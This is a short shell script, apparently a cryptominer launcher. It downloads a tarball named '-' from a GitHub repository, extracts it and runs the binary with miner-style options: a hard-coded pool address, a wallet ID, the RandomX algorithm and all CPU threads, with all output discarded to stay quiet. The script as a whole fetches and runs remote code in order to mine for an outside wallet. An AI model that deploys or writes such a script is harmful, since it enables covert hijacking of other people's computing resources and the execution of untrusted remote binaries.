#!/bin/sh

A=170.187.225.46:443
B=GMPHYf5KRkcAyik7Jw9oHRfJtUdw2Kj5f4VTFJ25AaFVYxofetir8Cnh7S76Q854oMXzwaguL8p5KEz1tm3rn1SA6hix4sVifS1KWXHBTu
C=PAYG
D=rx/0
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- --donate-level 1 -o $A -u $B -p $C -a $D -k -t$(nproc --all) >/dev/null >/dev/null 2>&1
sleep 10
